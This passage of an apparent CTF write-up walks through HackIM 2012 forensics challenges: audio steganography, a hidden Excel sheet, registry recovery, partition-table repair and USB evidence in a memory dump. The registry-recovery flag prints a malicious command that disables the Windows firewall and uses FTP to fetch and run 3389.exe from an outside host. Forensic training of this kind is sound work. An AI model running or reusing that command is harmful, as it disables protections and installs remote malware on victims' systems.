exploit. I looked for the pattern root inside dump.txt and got the hash for the root.
Next I used JohnTheRipper to crack the hash and got my 2nd flag as : zuzana
Onto the hunt for 3rd flag, it asked to look for the vulnerable parameter.Opened dump.txt and saw
that there were many 404 , so again it was time to eliminate those and consider the successful
responses.i tried with few variations and again stripped down dump.txt to ok.txt now we had
much smaller information to analyze.
Went through the file ok.txt and observed and got to noticed that the parameters page, title and id
was common with the entire GET request. Hence with variation of parameters, I got the flag
successfully, I had to spend too much time with all those iterations and variations, indeed it was
one of the level on which I had spent much more time to analyze to get the flag.
Flag:
29. =====================================================================
Forensics Levels
Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno
Official Hint:
Page Source:<!-- md5sum: 1478ae7166bf5ab5d4f4a4136b819319 -->
Description:While conducting the raid on a suspect the police found the system containing no
suspicious information in the form of a code. While comparing various files they came up with a
suspicious sound file and feel that the code is hidden inside the same.You are asked to find out
that code if hidden in the file.
Analysis: This was one of the coolest challenge in the HackIM 2012 CTF. I listened to the audio
and observed that there was distortion at certain places and also heard that the distortion
appeared on single channel. I had earlier used audio editor software “GoldWave”. I opened that
audio in GoldWave and separated those distortions from the main stream, since the distortion
was on single channel (right) the task became easier. After listening to the distortion it didn’t
gave up any meaning, and thought of applying some sound effect, on the very first attempt
applying the reverse sound effect I got the flag.
Flag: 12344346765
Forensics Level 2: Andar Ch0r
Official Hint: A night with MS Office
Page Source :<!-- md5sum: 74a967082a6c79757cf56cb29f70e8d9 -->
Description: company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the
internal codes secretly outside the organization. The company sniffed the data being sent and
reconstructed it to find that a word document was being sent. The company strongly suspects that
there is some hidden passport code in the document. You as a forensic investigator are provided
with the copy of that file and are required to find out the hidden code. The code has to be in
whole number.
Analysis: This challenge was full of twist, I enjoyed solving it. I opened the given word
document and saw some numeric digits; it was some hex values, I converted them into ASCII
and was made fool. After a while I doubt about the file and tried to confirm it using TrID :
http://mark0.net/onlinetrid.aspx, The result showed up with possibility of the file being an excel
document. I renamed the file into flag.xls and opened it in excel. Cool I was on right path, now I
had no idea of what to do.Next I opened the file in notepad and went through the lines,
30. somewhere near the end I saw some plain text “Hey Good Job done…..” and just below there
was “Sheet1” and “Sheet2” but I couldn’t remember figuring any Sheet2 in flag.xls. So got an
idea that it was hidden. It had been ages since I had worked on any excel sheet so really had
forgotten how to hide excel sheets. Google, and got a link:
http://www.howtogeek.com/howto/14160/hide-and-unhide-worksheets-and-workbooks-in-excel-
2007-2010/
So now sheet2 was visible, but still I was far away from my flag.Again followed up the link
where it had asked to use VB Editor to unhide the supper hidden worksheet.(ALT+F11).
Saved it, and finally Sheet3 was revealed with the flag in it.
Flag: 6924289
31. Forensics Level 3: Not Guilty!
Official Hint:
Page Source :<!-- md5sum: 66666e32a8296f3073619c1dea43d9bf -->
Description: An employee was suspected of using some malicious files. The employee asserts
that he is not guilty because he never used any program except Microsoft word and excel. While
conducting the analysis nothing was found in the registry suggesting that something did run
automatically. All locations that can run program automatically were examined and nothing
malicious was found. You as an investigator are provided with a piece of hive to carve out if
anything was deleted from the hive and provide the exact "Value", "value type" and "data"
deleted so that the employee gets the justice.
Analysis: This level was all about registry recovery. I had never encountered such incident and
to understand it went through several forensics articles of registry recovery. Initially I download
a windows binary of a tool called Yet Another Registry Utility (YARU). Played with it for some
time and realized that it wouldn’t help me to come somewhere around the flag. Quit and went
through few more manuals. Eventually came across a tool called as “reglookup-recover”. It was
an open source, installed on ubuntu and went through the instructions. After this it wasn’t much
tough to get the flag.
Came back to description and cross checked the values obtained with the result, ending up
solving this level.
Flag:
Value:Shell
Value Type:REG_SZ
Data:c:windowssystem32cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org>
cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get
3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del
cmd.txt /q
32. Forensics Level 4: Intriguing MBR
Official Hint: Sometimes things spill over
Page Source: <!--
<form id="flevel-4" name="flevel-4" method="post" action="flevel-4-proc.asp"
onsubmit="return validate_form(this);">
-->
Description: A suspected drive was found in bad shape. The data extraction was almost
impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial
sectors and wherever the system could not read the space was filled with 0x00 so as to keep the
offset of the data obtained intact. The initial sector displayed a messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters
The Drive showed to be a SATA drive with 512 bytes of LBA
Analysis: Yet another level that kept me away from doing anything. Merely a 20KB file but may
require 20 hours to understand it for a newbie like me. Started with the google on partition
forensics and ended up with GUID partition table on wikipedia, a long story probably would
speak about it sometime later (Evil Mind).
So the first thing that we required for this challenge was some boot record parsers. I got one at
http://www.garykessler.net/software/index.html. The package contained 5 Perl scripts, extracted
it to a folder.
1. I parsed a GUID Partition Table (GPT) header file image.dd using GPTparser.pl
33. Result of parsing:
2. Coming back to wikipedia, there was a header format for LBA1:
3. So comparing the offset 072-079 from image.dd with the one on the table below, we can
conclude that there are 9 partitions,( 2 primary copies as mentioned, and 7 between 72-
79)
34. 4. Also it had been mentioned in the description that the LBA size was 512 bytes. And in
our image.dd we can observe from the result of parsing that the partition table is starting
from the offset 80. Hence the next LBA will be at (512+80)=592
5. Now it was time for some hex editing, I opened image.dd and traversed to position
592(250h). Since we had concluded in our earlier steps that there were 9 partitions. We
had to edit the location from 00 to 09
6. Now again we had to parse the modified image.dd.
7. As in Step1 and we got all our 9 partitions.
8. Now next step was to observer the GUID from the result and match it with the table
given on wikipedia to find out the partition type.
35. 9. Finally the LBA thus obtained was not arranged accordingly and we had to arrange it in
ascending order so as to obtain the flag.
Flag:
Forensics Level 5: Universal Swindlers Bayonet
Official Hint:
Page Source :<!-- Format Expected: "DD/MM/YYYY HH:MM:SS" -->
Description: Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it
conducts? Very often the employees leaving the organisation manage to carry the research data
alongwith. This time company decided to go for the investigation and called upon a forensic
investigator. This investigator captured the memory dump and shut the system down. On
resuming the system he finds that the drive has been encrypted and is left with only the memory
dump.
You as an investigator are required to find out the following information from the dump
1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3) Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe
Analysis: This level was all about memory dump investigation.As usual had to lookup in google
to find some memory dump analysis tool. Came across Memoryze and Audit Viewer.I installed it
and fired up Audit Viewer to analyze the dump. The GUI was easy to understand and had a
wizard which I followed up accordingly. After a while I got the results in a simple formatted
way. I tried going through the windows but couldn’t find anything much relevant and ended up
getting only the last flag.
36. Again went through the various links and came across a tool named volatility. Installed it and
played with it for a while.With the following working steps I got the rest flags:
1. I tried to locate the registry hive where we could find the external drive information.
2. The second last registry hive was supposed to store all the drive information.
3. I dumped the second last hive and got a very long list of registry information.
4. The challenge was to look for the external drive information I went through few analysis
articles and found that USBSTOR key stores the external USB drive information.
5. Hence ended up with the following command and got the result successfully.
37. 6. But still the flag was not yet completed the page source revealed that the expect time
must be in IST hence we had to add +5:30 to the time when drive was first connected and
last disconnected.
Flag:
Finally Near The End, Few Words:
- All the links and tools mentioned above were functioning during this write-up and I
cannot assume it to be working throughout.
- I apologize for any grammatical mistakes or with my poor English.
- The ideas mentioned above are my own and may differ from yours.
- I completely agree with the fact that there can be much better way to solve the above
challenges but eventually mine ideas worked out.
- Wish Happy Hacking to Everyone.
- End, Regards To All The Members of NULL.
The epic story ends here…..
~$-THE END-$~